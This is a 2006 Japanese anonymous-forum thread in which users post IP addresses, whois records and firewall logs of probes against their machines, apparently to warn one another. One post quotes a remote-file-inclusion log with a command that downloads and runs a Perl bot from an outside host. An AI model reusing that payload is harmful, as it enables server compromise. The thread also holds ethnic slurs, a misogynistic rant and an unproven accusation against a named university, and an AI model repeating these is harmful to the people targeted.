IPアドレス 210.157.21.152 ホスト名 unused-210-157-021-152.interq.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
599 :
名無しさん@お腹いっぱい。 :2006/02/18(土) 20:19:36
219.146.0.0-219.147.31.255
CHINATELECOM-sd
Wang guang
[email protected] +86-10-58501724
600 :
名無しさん@お腹いっぱい。 :2006/02/19(日) 23:19:28
60.39.125.171
601 :
名無しさん@お腹いっぱい。 :2006/02/20(月) 22:35:56
211.212.0.0-211.215.255.255 HANANET チョン Ihyup Sung +82-2-106 ←今すぐtel! 211.212.15.0-211.215.15.255 HANANET-INFRA-KR
602 :
名無しさん@お腹いっぱい。 :2006/02/20(月) 22:37:00
シナチクうぜー! 211.147.243.0-211.147.248.255
603 :
名無しさん@お腹いっぱい。 :2006/02/20(月) 22:43:19
>>461 で晒されてるのが最近毎日攻撃ウザイ
しね!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
今後に期待age
また461ネタか
あぼーん
inetnum:202.127.144.0-202.127.159.255
netname:WHCAS-CN
descr:chines Academy of Science, Wuhan Branch
descr:Wuhan Institute of Pysics
descr:Wuhan,Hubei 430071
country:chankoro
admin-c:LH90-AP
tech-c:LH90-AP
mnt-by:MAINT-CNNIC-AP
changed:
[email protected] 20010329
statas:ALLOCATED PORTABLE
source:APNIC
person:Li Hong
nic.hadl:LH90-AP
e-mail:
[email protected] address:No4,Zhongguancun 4th South Street,Haidian District, Beijing
phone:+86-10-58812000
fax-no:+86-10-58812900
country:chankoro
changed:
[email protected] 20041109
mnt-by:MAINT-CN-LIHONG
source:APNIC
610 :
名無しさん@お腹いっぱい。 :2006/02/22(水) 21:58:52
IPアドレス 202.83.135.35 ホスト名 対応するホスト名がありません IPアドレス割当国 ※ 日本 (JP)
611 :
名無しさん@お腹いっぱい。 :2006/02/23(木) 22:17:32
219.182.184.128
さっきからIPを変えつつ叩いてくる輩がいる・・・うぜー
IP変えてって・・・
614 :
名無しさん@お腹いっぱい。 :2006/02/25(土) 02:57:41
222.149.193.128
ほんと中国多いな
616 :
名無しさん@お腹いっぱい。 :2006/02/25(土) 10:34:00
125.52.33.184 125.52.33.184 125.52.33.184
203.211.254.55
IP Address 220.171.28.74 Network CHINANET-XJ Location China Province network CHINANET xinjiang +86-10-58501724 LI ZHAO +86-991-5820832
59.34.196.37 61.145.112.142
すげー回線の調子悪いと思って、 ルーターのログ見たら・・・ 同じプロバイダーのIPの近い奴に、 凄まじい勢いでポート80叩かれてたorz もちろんルーターが弾いてくれてたから、 侵入とかはなかったけど・・・ なんなんだよあいつは・・・
恐ろしいな
IPアドレス 206.223.150.96 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし アメリカウザイ
624 :
623 :2006/02/26(日) 19:16:02
ちなみにヒット数は10
またアメリカから ヒット数5 IPアドレス 65.54.194.118 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
59.85.21.159 59.85.24.225 59.85.15.197 59.85.14.36
219.180.242.40 220.209.205.16
今日はさらにひどい・・・ 61.213.191.200 日本 207.68.178.61 アメリカ 219.166.142.212 日本(福井) 61.236.229.19 中国 60.190.23.156 中国 しかしホント中国多いな
629 :
名無しさん@お腹いっぱい。 :2006/02/27(月) 19:22:26
こんな場末に晒してなんか意味あんのかね? 警察に通報した方がまだ有意義と思うが。
630 :
名無しさん@お腹いっぱい。 :2006/02/27(月) 20:39:02
2006年2月27日 18:15:58 Unrecognized access from 43.244.85.117:4467 to TCP port 445 2006年2月27日 18:16:01 Unrecognized access from 43.244.85.117:4467 to TCP port 445 2006年2月27日 18:20:17 Unrecognized access from 43.244.105.92:1637 to TCP port 445 2006年2月27日 18:20:20 Unrecognized access from 43.244.105.92:1637 to TCP port 445 2006年2月27日 18:20:30 Unrecognized access from 43.244.240.16:1982 to TCP port 445 2006年2月27日 18:20:33 Unrecognized access from 43.244.240.16:1982 to TCP port 445 2006年2月27日 18:20:58 Unrecognized access from 43.244.240.16:3607 to TCP port 139 なんで、こんなに来るのか?
↑ aol.co.jpに問い合わせしたら?
132.248.202.37 メキシコ
633 :
名無しさん@お腹いっぱい。 :2006/02/27(月) 23:12:06
おまえら、本屋に売ってる 「ハニーポットなんちゃら」 って本はもう読んだか?
207.46.216.42 アメリカ ←毎日しつこい。 221.112.20.67 日本 65.54.194.118 アメリカ
12.120.13.25 アメリカ 65.54.194.118 アメリカ
さっきからIP変えつつ叩いてくる奴がいる。 219.103.130.30 日本 2006/02/28 21:23:03 - 2006/02/28 21:31:35 ヒット数56 219.103.130.29 日本 2006/02/28 21:23:03 - 2006/02/28 21:31:35 ヒット数94 65.216.116.114 アメリカ 今日やたら多い、ウゼー
ヒット数94て・・・
638 :
636 :2006/03/01(水) 13:16:27
IPAに通報しますた
具体的にどうやって通報したらいいの?< IPA
640 :
636 :2006/03/01(水) 15:04:50
Tnx!
なんかもうアクセス制限かけるのが面倒になってしばらく放置してる
643 :
名無しさん@お腹いっぱい。 :2006/03/02(木) 04:33:30
220.219.114.22 IPアドレス 220.219.114.22 ホスト名 ntszok045022.szok.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 光
644 :
名無しさん@お腹いっぱい。 :2006/03/02(木) 04:35:21
60.46.92.2 IPアドレス 60.46.92.2 ホスト名 p5002-ipad302sasajima.aichi.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 xDSL
645 :
名無しさん@お腹いっぱい。 :2006/03/02(木) 05:16:48
IPアドレス 125.193.92.164 ホスト名 FLH1Adr164.hyg.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 光
646 :
名無しさん@お腹いっぱい。 :2006/03/02(木) 05:20:00
IPアドレス 58.87.190.191 ホスト名 p57bebf.hkidnt01.ap.so-net.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道 市外局番 -- 接続回線 光
61.129.49.125 国不明 12.120.37.21 国不明 65.216.116.114 国不明
648 :
名無しさん@お腹いっぱい。 :2006/03/02(木) 22:24:57
inetnum: 221.5.128.0-221.5.255.255 netname: CNC GROUP-CQ descr: CNC Group Chongqing province network descr: China Network Communications Group Corporation descr: No.156,Fu-Xing-Men-Nei Street, descr: Beijing 100031 country: CN admin-c: CH455-AP
>>647 >>1 のNeoTrace Express使うよろし。
whoisからtracert、国とその国のどこの都市や地域から、
発信されたかまでわかる。
58.12.163.188から数千回にわたるSSHアタックが。 USENを利用している奴らしい。 mynetwatchmanでもすでに探知されてる。
リモートコードインジェクション攻撃来た・・。
しかもものの見事に200返してるし・・・
wldthng.nexcess.net "GET /thisdoesnotexistahaha.php HTTP/1.1" 404
wldthng.nexcess.net "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 200 50 "-" ★
wldthng.nexcess.net "GET /cal/tools/send_reminders.php HTTP/1.1" 404
wldthng.nexcess.net "GET /Calendar/tools/send_reminders.php HTTP/1.1" 404
:
wldthng.nexcess.net "GET /webcalendar/tools/send_reminders.php HTTP/1.1" 200 ★
:
wldthng.nexcess.net "GET
http://xxx.xxx.xxx.xxx//webcalendar/tools/send_reminders.php? includedir=
http://81.58.26.26/libsh/shit.txt?&cmd= HTTP/1.1" 200 1341 "-" "-"
最後の行でセキュリティーホール突かれてる・・。
http://81.58.26.26/libsh/shit.txt見ると 、色々wgetしたり色々している。
-----------------------------------------------------
$SCWD = `wget
http://81.58.26.26/libsh/ping.txt;mv ping.txt temp2006
;perl temp2006 213.25.56.61 3303・・・・
-----------------------------------------------------
httpdのerrorlog見るともろ実行しているし・・。
--08:24:09--
http://81.58.26.26/libsh/ping.txt => `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory.
Use -S to search $PATH for it.
:
:
sh: ./ping: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
6 15808 6 1123 0 0 1660 0 0:00:09 --:--:-- 0:00:09 1660
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory
⇒ちなみにpingってファイルはLinux/RSTっちゅうLinuxのウイルスだったり
/tmp配下にPerlのBOTが吐かれてたり。恐ろしいです。要注意・・・。
655 :
647 :2006/03/03(金) 19:09:16
656 :
名無しさん@お腹いっぱい。 :2006/03/03(金) 23:35:31
IPアドレス 61.89.135.214 ホスト名 pon003-214.kcn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし Domain Information: [ドメイン情報] a. [ドメイン名] KCN.NE.JP b. [ねっとわーくさーびすめい] c. [ネットワークサービス名] KCN-Netサービス d. [Network Service Name] KCN-Net Service k. [組織種別] ネットワークサービス l. [Organization Type] Network Service m. [登録担当者] YK261JP n. [技術連絡担当者] TK382JP p. [ネームサーバ] dns0.kcn.ne.jp p. [ネームサーバ] dns1.kcn.ne.jp [状態] Connected (2006/10/31) [登録年月日] 1998/10/21 [接続年月日] 1998/11/13 [最終更新] 2005/11/01 01:18:26 (JST)
657 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 00:17:48
IPアドレス 221.230.31.42 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
658 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 00:19:13
IPアドレス 219.107.190.124 ホスト名 FLA1Aaz124.stm.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 xDSL Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.107.0.0/16 b. [ネットワーク名] BIGLOBE-6 f. [組織名] BIGLOBEサービス(日本電気株式会社) g. [Organization] NEC Corporation m. [管理者連絡窓口] NK032JP n. [技術連絡担当者] MK11728JP p. [ネームサーバ] ns02.mesh.ad.jp p. [ネームサーバ] ns03.mesh.ad.jp [割当年月日] 2002/06/14 [返却年月日] [最終更新] 2004/04/12 17:47:01(JST) 上位情報 ---------- 日本電気株式会社 (NEC Corporation) [割り振り] 219.107.0.0/16
659 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 01:00:31
IPアドレス 220.208.44.210 ホスト名 -- IPアドレス 割当国 ※ -- 都道府県 -- 市外局番 -- 接続回線 -- Whois 検索結果 IPアドレス 所有者情報 -- ドメイン 所有者情報 --
660 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 01:02:30
IPアドレス 201.43.17.63 ホスト名 201-43-17-63.dsl.telesp.net.br IPアドレス 割当国 ※ ブラジル (BR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
661 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 13:29:53
ウイルスバスターのLANパトでやたらとしらんIPがあるんだが・・・
662 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 16:43:18
IP近いのなら同じプロパイダの奴でしょ。
ほったらかしでおKなのか?
664 :
名無しさん@お腹いっぱい。 :2006/03/04(土) 21:03:57
218.135.64.118 またあほーだぜ
210.135.99.5
666 :
名無しさん@お腹いっぱい。 :2006/03/05(日) 03:01:58
PC−Clienをかけたら不正アクセスが激減したんですが・・・ (関係ないのかな?) それまではプリ音食べすぎのアメリカ人が狂ったように(実際問題狂ってるが) ウチに来てました
TransScoutでしつこい奴 IPアドレス 218.171.128.96 ホスト名 218-171-128-96.dynamic.hinet.net IPアドレス 割当国 ※ 台湾 (TW) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
Rat トロイの木馬のデフォルト遮断 IPアドレス 125.213.101.187 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
Phinneas Phucker トロイの木馬のデフォルト遮断 IPアドレス 220.7.60.15 ホスト名 softbank220007060015.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 群馬県 市外局番 -- 接続回線 xDSL
FTP99CMP トロイの木馬のデフォルト遮断 IPアドレス 219.110.151.5 ホスト名 h219-110-151-005.catv02.itscom.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 CATV
Bla トロイの木馬のデフォルト遮断 IPアドレス 222.45.80.12 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
すみません。どうして自分のパソコンを狙ってるのでしょう? それとも手当たり次第にやってるだけなの?
>>672 IPアドレスがどういうものか考えればわかるよ。
674 :
sage :2006/03/05(日) 09:56:14
210.136.161.74 proxy360.docomo.ne.jp DoCoMo/2.0SH901iC(c100;TB;W30H15) DoCoMo/2.0SH901iC(c100;TB;W30H15)
IPアドレス 221.39.214.10 ホスト名 softbank221039214010.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 青森県 市外局番 -- 接続回線 xDSL こいつウザイ
207.46.216.30-47 末尾変えつつ百回以上 アフォですか?
>>676 てめぇが何かに感染していてアクセスがウゼェから反対にやられているんじゃねえのかよ?
678 :
名無しさん@お腹いっぱい。 :2006/03/06(月) 01:21:56
Mar 6 00:21:48 ntrap sshd[3187]: refused connect from mrt02.me.noda.sut.ac.jp アホ大学晒しあげ
679 :
名無しさん@お腹いっぱい。 :2006/03/06(月) 01:33:56
詳細: 侵入を検出して遮断しました。 tmp6.2ch.net(206.223.149.90) とのすべての 通信は 30 分間にわたって遮断されます。 何故にダウソ板から・・・?
>>676 一週間ぶりにPC立ち上げたらルーターに足跡があったんだが
なんで一方的に決めつけてそんなに激ってるのかわからん
カルシウム不足ですか?
682 :
名無しさん@お腹いっぱい。 :2006/03/06(月) 02:16:48
IPアドレス 210.239.42.143 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
221.10.158.106 糞シナ
684 :
名無しさん@お腹いっぱい。 :2006/03/06(月) 18:05:07
IPアドレス 206.204.51.131 ホスト名 security.symantec.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし Whois 検索結果 IPアドレス 所有者情報 206.204.51.131 を whois.arin.net で検索しました
685 :
名無しさん@お腹いっぱい。 :2006/03/06(月) 18:06:39
IPアドレス 206.204.51.131 ホスト名 security.symantec.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
686 :
名無しさん@お腹いっぱい。 :2006/03/06(月) 18:37:52
IPアドレス 221.235.144.175 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
688 :
さくら :2006/03/07(火) 01:01:23
61.156.240.66(CN) UDP=2,1026,1027,1028,1029,1031,1032,1033,4073 221.203.145.73(CN) UDP=2,1026,1027,1028,1029,1030,1031,1032,1033,4073,4081 こいつらしつこい。 211.190.179.180(KR) TCP=6129,1025 211.154.43.85(CN) TCP=6129 Backdoorを探索中?
IPアドレス 59.117.122.6 ホスト名 59-117-122-6.dynamic.hinet.net IPアドレス 割当国 ※ 台湾 (TW) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
IPアドレス 221.87.148.145 ホスト名 softbank221087148145.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 鹿児島県 市外局番 -- 接続回線 xDSL 薩摩武士ですよ〜
692 :
名無しさん@お腹いっぱい。 :2006/03/08(水) 00:31:02
1. 2006/03/07|22:55:23| Port scan attempt 58.18.64.162 1 2. 2006/03/07|22:45:03| Port scan attempt 218.61.35.52 1 3. 2006/03/07|22:34:57| Port scan attempt 221.195.72.74 1 4. 2006/03/07|22:29:41| Port scan attempt 58.18.64.162 1 5. 2006/03/07|21:43:55| Port scan attempt 218.61.35.52 2 6. 2006/03/07|21:23:08| Port scan attempt 221.211.255.11 1 7. 2006/03/07|19:55:17| Port scan attempt 58.18.64.162 2 8. 2006/03/07|19:40:10| Port scan attempt 60.11.125.38 2 9. 2006/03/07|19:03:53| Port scan attempt 58.18.64.162 3 10. 2006/03/07|18:50:38| Port scan attempt 221.5.251.183 9 11. 2006/03/07|17:21:00| Port scan attempt 58.18.64.162 1 12. 2006/03/07|16:50:05| Port scan attempt 218.61.35.52 1 13. 2006/03/07|13:55:16| Port scan attempt 58.18.64.162 3 14. 2006/03/07|13:03:03| Port scan attempt 221.203.145.29 1 15. 2006/03/07|12:57:39| Port scan attempt 218.61.35.52 1 16. 2006/03/07|11:20:52| Port scan attempt 58.18.64.162 1 17. 2006/03/07|11:15:10| Port scan attempt 60.11.125.38 1 18. 2006/03/07|10:40:45| Port scan attempt 221.5.251.183 2 19. 2006/03/07|09:17:54| Port scan attempt 220.168.158.13 2 20. 2006/03/07|09:12:23| Port scan attempt 58.18.64.162 1 21. 2006/03/07|09:05:29| Port scan attempt 218.61.35.52 2 22. 2006/03/07|07:55:12| Port scan attempt 58.18.64.162 2 23. 2006/03/07|07:32:22| Port scan attempt 221.211.255.11 1 24. 2006/03/07|06:12:16| Port scan attempt 58.18.64.162 4 25. 2006/03/07|05:14:52| Port scan attempt 221.211.255.11 1 26. 2006/03/07|04:29:24| Port scan attempt 58.18.64.162 2 27. 2006/03/07|02:54:53| Port scan attempt 221.211.255.11 1 28. 2006/03/07|02:53:22| Port scan attempt 60.11.125.38 2 29. 2006/03/07|02:46:28| Port scan attempt 218.61.35.52 2 30. 2006/03/06|23:21:18| Port scan attempt 58.18.64.162 5
693 :
名無しさん@お腹いっぱい。 :2006/03/08(水) 22:41:08
ポートスキャン 202.214.159.206 192.168.11.10 2006/03/07 21:35:13 - 2006/03/07 21:43:58 15 Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 202.214.159.0/24 b. [ネットワーク名] ACCELIA-NET f. [組織名] アクセリア 株式会社 g. [Organization] Accelia, Inc. m. [管理者連絡窓口] TC116JP n. [技術連絡担当者] AK1474JP p. [ネームサーバ] ns-ac-01.accelia.net p. [ネームサーバ] ns1.iij.ad.jp [割当年月日] 2001/01/25 [最終更新] 2004/01/29 10:45:08(JST) 上位情報 ---------- 株式会社インターネットイニシアティブ (Internet Initiative Japan Inc.) [割り振り] 202.214.0.0/16 下位情報 ---------- 該当するデータがありません。
694 :
名無しさん@お腹いっぱい。 :2006/03/08(水) 22:52:58
IPアドレス 59.84.99.163 ホスト名 p163.net059084099.tokai.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 種別不明
695 :
名無しさん@お腹いっぱい。 :2006/03/09(木) 02:46:19
ウィンドウズファイル共有って何かあんの? 他の135だのの時もあるけどファイル共有が多いんだ
>>695 Remote Procedure Call (RPC)
一番セキュリティホールが多いのが135番だから、
WindowsUpdateをしていないやつらが狙われるし、感染に気づいていない感染者も一番多い。
アクセス元じゃなくてアクセス先ポートが135番になっている場合は、
不正アクセスして来たこいつらのパソコンは、まずネットワークワームに感染している。
このポートだけは擬似的にファイアーウォールでしか閉じられない。
697 :
名無しさん@お腹いっぱい。 :2006/03/09(木) 09:11:33
>696 どうもありがとう。 ポートは139だった…
IPアドレス 219.206.140.55 ホスト名 softbank219206140055.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 xDSL 5分置きに突撃してくる。うざい(;・∀・)
IPアドレス 221.244.122.36 ホスト名 221x244x122x36.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光
58.0.132.48 うぜー しかもこいつ暢気に鯖なんか立ててる
701 :
名無しさん@お腹いっぱい。 :2006/03/12(日) 15:56:31
libwww-perl/5.803 とか lwp-trivial/1.41 を使って、とうの昔に既になくなったディレクトリやファイルを 2,3日ごとにチェックしにくるのって怪しいよな? 晒すべきか?
702 :
名無しさん@お腹いっぱい。 :2006/03/12(日) 16:40:38
うげー! IP調べてみた上でググってみたら、某IT関連大学(?)の教授だったぞ! 結構有名な奴みたいじゃねえかよ。 しかも2ちゃんに彼に関するスレまでありやがる… 俺はどうすべきなのだろう。はっきり言って超キモい。 大学に電話かメールすべきだろうか
(^ω^;)がんばれ…
704 :
名無しさん@お腹いっぱい。 :2006/03/12(日) 17:47:59
>>703 ここで晒すつもりだったが、誰のIPかハッキリわかってしまうので
非常にまずい気がする
本人がやっているのだとしたら、もう滅茶苦茶バカな奴としか胃炎
それもとこいつのパソが悪用されているのか…
むう・・どうすんべ・・・
IPアドレス 219.48.146.99 ホスト名 softbank219048146099.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 xDSL IPアドレス 210.236.186.123 ホスト名 dhcp186-122.ztv.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 和歌山県 市外局番 -- 接続回線 CATV
63.251.51.229
709 :
名無しさん@お腹いっぱい。 :2006/03/12(日) 20:10:23
>>708 けどその2chのスレけっこう古くて今だれも書き込んでねえんだよ
やっぱここに晒しとくか。
163.221.xx.xx
奈良先端科学技術大学院大学
まずはとりあえずこれだけにしとく。IP検索で出てくる当人の仕業では
ないのかもしれんし…
にしても、とんちんかんな場所にコソコソとアクセスを試みてくるんで、
まじでウザい。
ほぼ lwp-trivial/1.41。ごくたまに libwww-perl/5.803。
嘘書くなとかいっていちゃもんつけられる可能性もあるかもしれねえから、
しばらくアクセスログ保管しとこう。
で、あと1週間様子見てまだ続くようなら大学に正式に苦情してみるか。
>>711 奈良先端か。
じゃ別にIT系ってわけでもないな、まあNECが噛んでるからあれだけど
あそこは学生も年齢の幅も国籍もいろいろいるからなー
しかも、学生寮も家族寮も教授用の宿舎もLAN完備だし、当人の仕業でない可能性も高いな
研究室以外、出入りチェックも無いに等しいからね
信頼済みではないコンピュータ機器に接続されています。 IPアドレス192、168、1,1 コンピュータ名? MACアドレス00:0b:a2:21:c7:26
IPアドレス220.213.99.117
Rat トロイの木馬 IPアドレス 217.122.128.221 ホスト名 cc503731-a.hgv1.dr.home.nl IPアドレス 割当国 ※ オランダ (NL) Ripper トロイの木馬 IPアドレス 61.64.169.200 ホスト名 61-64-169-200-adsl-tai.dynamic.so-net.net.tw IPアドレス 割当国 ※ 台湾 (TW) Ripper トロイの木馬 IPアドレス 59.117.122.6 ホスト名 59-117-122-6.dynamic.hinet.net IPアドレス 割当国 ※ 台湾 (TW
IPアドレス 218.130.40.10 ホスト名 softbank218130040010.bbtec.net IPアドレス割当国 ※ 日本 (JP) 都道府県 大阪府 市外局番 -- 接続回線 xDSL
210.136.232.249 ad.jp.ap.valuecommerce.com こんな時間に勝手に何やってるんだ??
>>715 それバリューコマースのクリック型広告鯖じゃねえの?
>>718 そうだけど、なんでうちの鯖に約二時間の間、執拗にアクセスしてるんかが不明
こっちは何もしてないんだけど、どういうこと?
718 :
名無しさん@お腹いっぱい。 :2006/03/13(月) 13:48:07
IPアドレス 58.3.88.93 ホスト名 ppp5935.hakata03.bbiq.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光 かなり調べたけど都道府県がでねえー(ノд`) 晒したいのに・・ 。゜(゚´Д`゚)゜。
IPアドレス 219.116.204.171 ホスト名 eatkyo369171.adsl.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 埼玉県 市外局番 -- 接続回線 xDSL
IPアドレス 220.208.245.252 ホスト名 nissin48252.ccnw.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 CATV
>>718 ,719-720
何をどう攻撃されたのか詳しく
IPアドレス 220.213.59.241 ホスト名 z241.220-213-59.ppp.wakwak.ne.jp
IP: 218.110.6.185 Node: 設計課共用 Group: WORKGROUP NetBIOS: WORKGROUP MAC: 削除 DNS: p6e06b9.tokynt01.ap.so-net.ne.jp so-netサンいいんすか?
725 :
名無しさん@お腹いっぱい。 :2006/03/13(月) 23:14:58
219.182.184.20 しつこくて困ってます。 何とかならないですか?
>>あほーじゃ文句言っても無駄そうだから遮断してあきらめれ
2006/03/13 22:58:32,スーパーバイザ, 侵入: HTTP MSIE JavaScript OnLoad Rte CodeExec," 侵入: HTTP MSIE JavaScript OnLoad Rte CodeExec 侵入者: pc7.2ch.net(206.223.147.60)(http(80)) 危険度: 高レベル プロトコル: TCP 攻撃された IP: localhost 攻撃された ポート: 4930" これって何だろ。
ブラクラ・チェッカーで板を検査すると、 臭いのが出るんだよなw
IP: 218.70.253.186 Node: BILLGATES Group: WORKGROUP NetBIOS: __MSBROWSE__ MAC: 削除 DNS: BILLGATES ビルゲイツ?
思わず検索かけちゃうぞ?
IPアドレス 59.146.166.124 ホスト名 p92a67c.szoknt01.ap.so-net.ne.jp
ルータのセキュリティ・ログもお祭り状態だな・・・。
よく分からん世界だな・・・。
IPアドレス 206.246.241.120 ホスト名 tawakoni.html.com ほんと多いな いつか恨みでも買ったかな
735 :
名無しさん@お腹いっぱい。 :2006/03/14(火) 12:36:22
61.125.152.248:135 攻撃されまくりんぐ
IPアドレス 222.5.14.186 ホスト名 ZK014186.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道 市外局番 -- 接続回線 xDSL
それは、どこかで見たことがあるような(笑
222.162.246.244(CN) なんでうちにwww.lineage2.jpが…?
うちにもこないだ来たよwww.lineage2.jp ボットとかの関係?ネトゲやらんからよくわからん。
IPアドレス 220.106.47.225 ホスト名 p11225-adsau14honb8-acca.tokyo.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 xDSL IPアドレス 61.213.172.117 ホスト名 server117.canalize.com IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし この二つがほぼ同じ時間に同時に攻撃してきたんだけど
【積年の】旦那にしてる密かな仕返し【恨みじゃー】
http://human5.2ch.net/test/read.cgi/ms/1141694640/ 8 名前:可愛い奥様[] 投稿日:2006/03/07(火) 11:05:23 ID:8dtluKkp
夫の歯ブラシで洗面所の排水溝掃除。
洗面所をビショビショに汚した罰だ。
20 名前:可愛い奥様[age] 投稿日:2006/03/08(水) 00:40:17 ID:pRrk6A21
前に頭きた時あって
1度だけ歯ブラシで肛門カキカキしちゃった
22 名前:可愛い奥様[] 投稿日:2006/03/08(水) 01:27:12 ID:gU5mHc7J
よかった。どこのお宅も同じようなことしてて。
24 名前:可愛い奥様[] 投稿日:2006/03/08(水) 01:36:35 ID:SSSFsTqE
そうそう、ヘンなモノはダンナのお皿へ直行だよね。
41 名前:可愛い奥様[] 投稿日:2006/03/08(水) 11:55:18 ID:sjj+/60Q
見てるだけで気が晴れるな!
皆さん、頑張ってね!
42 名前:可愛い奥様[sage] 投稿日:2006/03/08(水) 20:33:51 ID:Ju2N1s7+
年金分割が楽しみじゃのう
63 名前:可愛い奥様[] 投稿日:2006/03/10(金) 08:55:20 ID:qLfJYpJR
家族で密かにはぶっている。
男性は肉体が汚く、精神が美しい傾向がある。(気に入らない相手に肉体的攻撃を加える⇒精神的攻撃も加える男は猛者)
女は肉体が美しく、精神が汚い傾向がある。(気に入らない相手に精神的攻撃を加える⇒肉体的攻撃も加える女は猛者)
女は隠れて悪事をする。気に入らない女子を便所でボコったり、便器舐めさせたり、男の友人を使ってレイプ、仲間外れにしたり。陰口、嫉妬。
女は対人関係において、この汚い性格を隠そうとするため、外面が非常によくなる。(猫かぶり)
男性諸君は外面に騙されないように気を付けて下さい。
744 :
名無しさん@お腹いっぱい。 :2006/03/14(火) 22:53:31
IPアドレス 221.244.122.36
ホスト名 221x244x122x36.ap221.ftth.ucom.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光
よく見てみると
>>699 と同じだ
219.95.79.138(マレーシア) 156.17.85.20(オランダ)
222.92.248.132(CN) verify.qq.com/getimage 何も出ないっつーの
だって中国だもん
IPアドレス220.208.33.148 IPアドレス218.104.36.242
750 :
名無しさん@お腹いっぱい。 :2006/03/17(金) 02:01:01
Mar 16 18:20:19 kabe sshd[930]: refused connect from pc3.message1-unet.ocn.ne.jp * 中略 * Mar 16 18:29:56 kabe sshd[1277]: refused connect from pc3.message1-unet.ocn.ne.jp a. [IPネットワークアドレス] 219.166.162.152/29 b. [ネットワーク名] MESSAGE-1 f. [組織名] メッセージワン株式会社 g. [Organization] MESSAGE ONE CORPORATION m. [管理者連絡窓口] MK8019JP n. [技術連絡担当者] MK8019JP p. [ネームサーバ] 侵入できそうなところを見つけてはコンサルと称して強請りでもやってのか、この会社は。
219.255.135.131 キムチ野郎w
82.70-85-153.reverse.theplanet.com 70.85.153.82
中国からワームがたくさん送られてくるのを何とかしてくれ。 多いときは10秒で30箇所くらいから送られてくるのは参った。
202.103.178.230 嫌だなぁ、こいつ
